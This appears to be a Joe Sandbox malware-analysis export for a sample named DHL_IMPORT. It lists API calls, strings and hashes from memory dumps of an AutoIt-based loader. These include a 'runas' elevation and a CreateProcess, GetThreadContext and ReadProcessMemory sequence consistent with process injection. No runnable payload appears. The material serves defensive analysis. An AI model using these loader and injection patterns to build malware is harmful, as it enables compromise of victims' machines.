• Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
• Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
Similarity
• API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
• String ID: GetNativeSystemInfo$kernel32.dll$|O
• API String ID: 3290436268-3101561225
• Opcode ID: ee3f4a6a926c8bf292596d7f0e9f2a3aae4329d8b9773f22be47a019df898c57
• Instruction ID: a0bfde3303356c2782a714f7c07fb27f96d89510e44a877b3861aefe5fd81f6a
• Opcode Fuzzy Hash: ee3f4a6a926c8bf292596d7f0e9f2a3aae4329d8b9773f22be47a019df898c57
• Instruction Fuzzy Hash: 1AA1936590A2C0DFEF11CF69BC491E67FB8BB27340F1858AAD18197F61D67C4988CB21

                                                                                          Control-flow Graph
                                                                                          • Graph image omitted; basic blocks 7d42a2-813612 call CreateStreamOnHGlobal, FindResourceExW, LoadResource, SizeofResource and LockResource
                                                                                          APIs
                                                                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,007D50AA,?,?,00000000,00000000), ref: 007D42B2
                                                                                          • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,007D50AA,?,?,00000000,00000000), ref: 007D42C9
                                                                                          • LoadResource.KERNEL32(?,00000000,?,?,007D50AA,?,?,00000000,00000000,?,?,?,?,?,?,007D4F20), ref: 008135BE
                                                                                          • SizeofResource.KERNEL32(?,00000000,?,?,007D50AA,?,?,00000000,00000000,?,?,?,?,?,?,007D4F20), ref: 008135D3
                                                                                          • LockResource.KERNEL32(007D50AA,?,?,007D50AA,?,?,00000000,00000000,?,?,?,?,?,?,007D4F20,?), ref: 008135E6
                                                                                          Similarity
                                                                                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                          • String ID: SCRIPT
                                                                                          • API String ID: 3051347437-3967369404

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 007D2B6B
                                                                                            • Part of subcall function 007D3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,008A1418,?,007D2E7F,?,?,?,00000000), ref: 007D3A78
                                                                                            • Part of subcall function 007D9CB3: _wcslen.LIBCMT ref: 007D9CBD
                                                                                          • GetForegroundWindow.USER32(runas,?,?,?,?,?,00892224), ref: 00812C10
                                                                                          • ShellExecuteW.SHELL32(00000000,?,?,00892224), ref: 00812C17
                                                                                          Similarity
                                                                                          • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                                                          • String ID: runas
                                                                                          • API String ID: 448630720-4000483414
                                                                                          Similarity
                                                                                          • API ID: Sleep$InputStateTimetime
                                                                                          • String ID:
                                                                                          • API String ID: 2764417729-0

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 007D2D07
                                                                                          • RegisterClassExW.USER32(00000030), ref: 007D2D31
                                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007D2D42
                                                                                          • InitCommonControlsEx.COMCTL32(?), ref: 007D2D5F
                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007D2D6F
                                                                                          • LoadIconW.USER32(000000A9), ref: 007D2D85
                                                                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 007D2D94
                                                                                          Similarity
                                                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                          • API String ID: 2914291525-1005189915

                                                                                          Control-flow Graph
                                                                                          • Graph image omitted; basic blocks 81065b-810983 call GetFileType, GetLastError and CloseHandle around a CreateFileW subcall
                                                                                          APIs
                                                                                            • Part of subcall function 0081039A: CreateFileW.KERNELBASE(00000000,00000000,?,00810704,?,?,00000000,?,00810704,00000000,0000000C), ref: 008103B7
                                                                                          • GetLastError.KERNEL32 ref: 0081076F
                                                                                          • __dosmaperr.LIBCMT ref: 00810776
                                                                                          • GetFileType.KERNELBASE(00000000), ref: 00810782
                                                                                          • GetLastError.KERNEL32 ref: 0081078C
                                                                                          • __dosmaperr.LIBCMT ref: 00810795
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 008107B5
                                                                                          • CloseHandle.KERNEL32(?), ref: 008108FF
                                                                                          • GetLastError.KERNEL32 ref: 00810931
                                                                                          • __dosmaperr.LIBCMT ref: 00810938
                                                                                          Similarity
                                                                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                          • String ID: H
                                                                                          • API String ID: 4237864984-2852464175

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                            • Part of subcall function 007D3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,008A1418,?,007D2E7F,?,?,?,00000000), ref: 007D3A78
                                                                                            • Part of subcall function 007D3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 007D3379
                                                                                          • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 007D356A
                                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0081318D
                                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 008131CE
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00813210
                                                                                          • _wcslen.LIBCMT ref: 00813277
                                                                                          • _wcslen.LIBCMT ref: 00813286
                                                                                          Similarity
                                                                                          • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                          • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                          • API String ID: 98802146-2727554177

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 007D2B8E
                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 007D2B9D
                                                                                          • LoadIconW.USER32(00000063), ref: 007D2BB3
                                                                                          • LoadIconW.USER32(000000A4), ref: 007D2BC5
                                                                                          • LoadIconW.USER32(000000A2), ref: 007D2BD7
                                                                                          • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 007D2BEF
                                                                                          • RegisterClassExW.USER32(?), ref: 007D2C40
                                                                                            • Part of subcall function 007D2CD4: GetSysColorBrush.USER32(0000000F), ref: 007D2D07
                                                                                            • Part of subcall function 007D2CD4: RegisterClassExW.USER32(00000030), ref: 007D2D31
                                                                                            • Part of subcall function 007D2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007D2D42
                                                                                            • Part of subcall function 007D2CD4: InitCommonControlsEx.COMCTL32(?), ref: 007D2D5F
                                                                                            • Part of subcall function 007D2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007D2D6F
                                                                                            • Part of subcall function 007D2CD4: LoadIconW.USER32(000000A9), ref: 007D2D85
                                                                                            • Part of subcall function 007D2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 007D2D94
                                                                                          Similarity
                                                                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                          • String ID: #$0$AutoIt v3
                                                                                          • API String ID: 423443420-4155596026

                                                                                          Control-flow Graph
                                                                                          • Graph image omitted; window-procedure basic blocks 7d3170-812e96 call DefWindowProcW, KillTimer, SetTimer, RegisterWindowMessageW, CreatePopupMenu, PostQuitMessage, MoveWindow and SetFocus
                                                                                          APIs
                                                                                          • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,007D316A,?,?), ref: 007D31D8
                                                                                          • KillTimer.USER32(?,00000001,?,?,?,?,?,007D316A,?,?), ref: 007D3204
                                                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 007D3227
                                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,007D316A,?,?), ref: 007D3232
                                                                                          • CreatePopupMenu.USER32 ref: 007D3246
                                                                                          • PostQuitMessage.USER32(00000000), ref: 007D3267
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                          • String ID: TaskbarCreated
                                                                                          • API String ID: 129472671-2362178303
                                                                                          • Opcode ID: 4332747bc5689926b26afe520cc7dc5bfb53a9ccde908baee505a478e7fcbdb5
                                                                                          • Instruction ID: 3da417bff3bfe66b0327c30a93be2ae3c7fe8c88c44258710ddf6793a041724e
                                                                                          • Opcode Fuzzy Hash: 4332747bc5689926b26afe520cc7dc5bfb53a9ccde908baee505a478e7fcbdb5
                                                                                          • Instruction Fuzzy Hash: AB41F935640609A7EF145FBCAC5DBBA3A79FB06340F080127F551C6BA1C7AE9A4097A3

                                                                                          Control-flow Graph (function at 3abc470; rendered graph not reproduced)
                                                                                          APIs
                                                                                          • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03ABC541
                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03ABC767
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1850341906.0000000003AB9000.00000040.00000020.00020000.00000000.sdmp, Offset: 03AB9000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3ab9000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateFileFreeVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 204039940-0
                                                                                          • Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                                          • Instruction ID: f74e68cd00224bc18bc7382d2db3d39e2abdef503b23bcb9d7698ad6c4ac8d1f
                                                                                          • Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                                          • Instruction Fuzzy Hash: 8CA11874E00209EBDB14CFA4C994FEEBBB9BF48314F24915AE105BB281D7799A80CF54

                                                                                          Control-flow Graph (function at 7d2c63; rendered graph not reproduced)
                                                                                          APIs
                                                                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 007D2C91
                                                                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 007D2CB2
                                                                                          • ShowWindow.USER32(00000000,?,?,?,?,?,?,007D1CAD,?), ref: 007D2CC6
                                                                                          • ShowWindow.USER32(00000000,?,?,?,?,?,?,007D1CAD,?), ref: 007D2CCF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$CreateShow
                                                                                          • String ID: AutoIt v3$edit
                                                                                          • API String ID: 1584632944-3779509399
                                                                                          • Opcode ID: a0a869455af8174e649012c85908afdbceb655b34838265339a057344cac8c7c
                                                                                          • Instruction ID: 8cc876c0da265732181f19b20769dc22dcbf52a58d6cc632f7ba0e22ac90898a
                                                                                          • Opcode Fuzzy Hash: a0a869455af8174e649012c85908afdbceb655b34838265339a057344cac8c7c
                                                                                          • Instruction Fuzzy Hash: DAF0DA765402A07AFF311B17AC0DE772EBDF7C7F60F01105AF900A2AA0C6A91850DBB0

                                                                                          Control-flow Graph (function at 3abc250; rendered graph not reproduced)
                                                                                          APIs
                                                                                            • Part of subcall function 03ABC140: Sleep.KERNELBASE(000001F4), ref: 03ABC151
                                                                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03ABC35D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1850341906.0000000003AB9000.00000040.00000020.00020000.00000000.sdmp, Offset: 03AB9000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3ab9000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateFileSleep
                                                                                          • String ID: 9EJNKRNMDOM
                                                                                          • API String ID: 2694422964-3060855963
                                                                                          • Opcode ID: c7cbd2c79e430a49c9918f4b54aba69bcd8c24818bc31299113e96a44939f58b
                                                                                          • Instruction ID: 590abaef1125f84e12db487a415b088b26be1e40aa6b9ea9fe958c4ec841fcb5
                                                                                          • Opcode Fuzzy Hash: c7cbd2c79e430a49c9918f4b54aba69bcd8c24818bc31299113e96a44939f58b
                                                                                          • Instruction Fuzzy Hash: 23519F70D14249EBEB10DBA4C948BEEBB7DAF48310F0041A9E609BB2C1D7791B44CBA5

                                                                                          Control-flow Graph (function at 7d3b1c; rendered graph not reproduced)
                                                                                          APIs
                                                                                          • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,007D3B0F,SwapMouseButtons,00000004,?), ref: 007D3B40
                                                                                          • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,007D3B0F,SwapMouseButtons,00000004,?), ref: 007D3B61
                                                                                          • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,007D3B0F,SwapMouseButtons,00000004,?), ref: 007D3B83
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseOpenQueryValue
                                                                                          • String ID: Control Panel\Mouse
                                                                                          • API String ID: 3677997916-824357125
                                                                                          • Opcode ID: f519f6d519e2c63645c26eddd5b68002d1f0685959ac089df1a643a20dca4c5f
                                                                                          • Instruction ID: b10281e70d386c298b4bcb8fb2efe734a629ac003372f586d4372f91dbdd9881
                                                                                          • Opcode Fuzzy Hash: f519f6d519e2c63645c26eddd5b68002d1f0685959ac089df1a643a20dca4c5f
                                                                                          • Instruction Fuzzy Hash: E01127B5610208FFDB208FA5DC85AAEBBB8EF04744B10846BE845D7210E2759E409BA1

                                                                                          Control-flow Graph (function at 3abb140; rendered graph not reproduced)
                                                                                          APIs
                                                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 03ABB8FB
                                                                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03ABB991
                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03ABB9B3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1850341906.0000000003AB9000.00000040.00000020.00020000.00000000.sdmp, Offset: 03AB9000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3ab9000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                          • String ID:
                                                                                          • API String ID: 2438371351-0
                                                                                          • Opcode ID: a1064bca5dd4e59baeb4dd15c17425526c3ac906ac097e7eb484fd7342f8cad6
                                                                                          • Instruction ID: 76303b504acd1ac88df52765ec3525813b88de92aa59d0f2ffa77dbe8b772896
                                                                                          • Opcode Fuzzy Hash: a1064bca5dd4e59baeb4dd15c17425526c3ac906ac097e7eb484fd7342f8cad6
                                                                                          • Instruction Fuzzy Hash: 86620C30A14258DBEB24CFA4C854BDEB376EF58300F1091A9D10DEB395E7769E81CB69
                                                                                          Strings
                                                                                          • Variable must be of type 'Object'., xrefs: 008232B7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Variable must be of type 'Object'.
                                                                                          • API String ID: 0-109567571
                                                                                          • Opcode ID: e674e74cae8c566a2a43f94f72c08295a01910daaa039d374d770028f5759c61
                                                                                          • Instruction ID: 3082fefeb8c839f34a9f3b50951fc566799088effd2c9c8cc79793451322c5fb
                                                                                          • Opcode Fuzzy Hash: e674e74cae8c566a2a43f94f72c08295a01910daaa039d374d770028f5759c61
                                                                                          • Instruction Fuzzy Hash: 15C29A70A00615CFCB25EF58D894AADB7B1FF09310F24816AE946AF391D379ED81CB91

                                                                                          Control-flow Graph (function at 7efddb; rendered graph not reproduced)
                                                                                          APIs
                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 007F0668
                                                                                            • Part of subcall function 007F32A4: RaiseException.KERNEL32(?,?,?,007F068A,?,008A1444,?,?,?,?,?,?,007F068A,007D1129,00898738,007D1129), ref: 007F3304
                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 007F0685
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Exception@8Throw$ExceptionRaise
                                                                                          • String ID: Unknown exception
                                                                                          • API String ID: 3476068407-410509341
                                                                                          • Opcode ID: 83f87b78dea94c47fb287ebd768ac9f72a666cba74596f821f29143027734423
                                                                                          • Instruction ID: aa938632555f7bdcbc80cb8708df346a0401f2cd6a279eccde29245edece519a
                                                                                          • Opcode Fuzzy Hash: 83f87b78dea94c47fb287ebd768ac9f72a666cba74596f821f29143027734423
                                                                                          • Instruction Fuzzy Hash: CCF0A42490020DF7CF04B6A5DC5AD7E7B6CAE40350B604131BB24D6792EF79DA2585C0
                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 008582F5
                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 008582FC
                                                                                          • FreeLibrary.KERNEL32(?,?,?,?), ref: 008584DD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$CurrentFreeLibraryTerminate
                                                                                          • String ID:
                                                                                          • API String ID: 146820519-0
                                                                                          • Opcode ID: 8ac20afd78a89dcde69be65fb1927350b612cbca3b61f7695a4efdab757b711b
                                                                                          • Instruction ID: 09cced3f4d7b68eb6bfad80c2ef202e0b593df2390f5974d27076a9d73405c18
                                                                                          • Opcode Fuzzy Hash: 8ac20afd78a89dcde69be65fb1927350b612cbca3b61f7695a4efdab757b711b
                                                                                          • Instruction Fuzzy Hash: 4C126C71A08341DFC714DF28C484A6ABBE1FF85319F04895EE889DB352DB35E949CB92
                                                                                          APIs
                                                                                            • Part of subcall function 007D1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 007D1BF4
                                                                                            • Part of subcall function 007D1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 007D1BFC
                                                                                            • Part of subcall function 007D1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 007D1C07
                                                                                            • Part of subcall function 007D1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 007D1C12
                                                                                            • Part of subcall function 007D1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 007D1C1A
                                                                                            • Part of subcall function 007D1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 007D1C22
                                                                                            • Part of subcall function 007D1B4A: RegisterWindowMessageW.USER32(00000004,?,007D12C4), ref: 007D1BA2
                                                                                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 007D136A
                                                                                          • OleInitialize.OLE32 ref: 007D1388
                                                                                          • CloseHandle.KERNEL32(00000000,00000000), ref: 008124AB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                          • String ID:
                                                                                          • API String ID: 1986988660-0
                                                                                          • Opcode ID: 3589562706f6a222b022029b67f62b46dcc47568165f7873eca44a4afdd41c6c
                                                                                          • Instruction ID: c47aa49d03b851c6db8bd69bfd923cc08e7c12e77024e115b762eaf46e744b15
                                                                                          • Opcode Fuzzy Hash: 3589562706f6a222b022029b67f62b46dcc47568165f7873eca44a4afdd41c6c
                                                                                          • Instruction Fuzzy Hash: 5A71CEB8D112108FEF84EFB9A84D6653AE1FB8B384F45823AD15AC7B61EB384444CF44
                                                                                          APIs
                                                                                            • Part of subcall function 007D3923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 007D3A04
                                                                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0083C259
                                                                                          • KillTimer.USER32(?,00000001,?,?), ref: 0083C261
                                                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0083C270
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: IconNotifyShell_Timer$Kill
                                                                                          • String ID:
                                                                                          • API String ID: 3500052701-0
                                                                                          • Opcode ID: e0e778f2ea7fd2268bf476255d76a94b34cb397c287cc74b3fb6f8da974321cc
                                                                                          • Instruction ID: b3d187a22b8a5885be2fc1db3e21c6ac0db52172cbc49f50e1f7b90101f45e4f
                                                                                          • Opcode Fuzzy Hash: e0e778f2ea7fd2268bf476255d76a94b34cb397c287cc74b3fb6f8da974321cc
                                                                                          • Instruction Fuzzy Hash: 1D319570904354AFEB229F648855BEBBBECFF46308F04049AD5DAA7241C7745A84CB91
                                                                                          APIs
                                                                                          • CloseHandle.KERNELBASE(00000000,00000000,?,?,008085CC,?,00898CC8,0000000C), ref: 00808704
                                                                                          • GetLastError.KERNEL32(?,008085CC,?,00898CC8,0000000C), ref: 0080870E
                                                                                          • __dosmaperr.LIBCMT ref: 00808739
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseErrorHandleLast__dosmaperr
                                                                                          • String ID:
                                                                                          • API String ID: 2583163307-0
                                                                                          • Opcode ID: adeb01f5326bb7daaa644d69b933657b00626889729a586fbfd3419fbab8adf3
                                                                                          • Instruction ID: 5b15648b182fcab9cc7b1b24b37a7731572a079bcebe4916497df5d7b4f05ec0
                                                                                          • Opcode Fuzzy Hash: adeb01f5326bb7daaa644d69b933657b00626889729a586fbfd3419fbab8adf3
                                                                                          • Instruction Fuzzy Hash: 19016F336052209AD6E062385C5977F6B45FBA3774F370119F864DB2D2DEA28CC18651
                                                                                          APIs
                                                                                          • TranslateMessage.USER32(?), ref: 007DDB7B
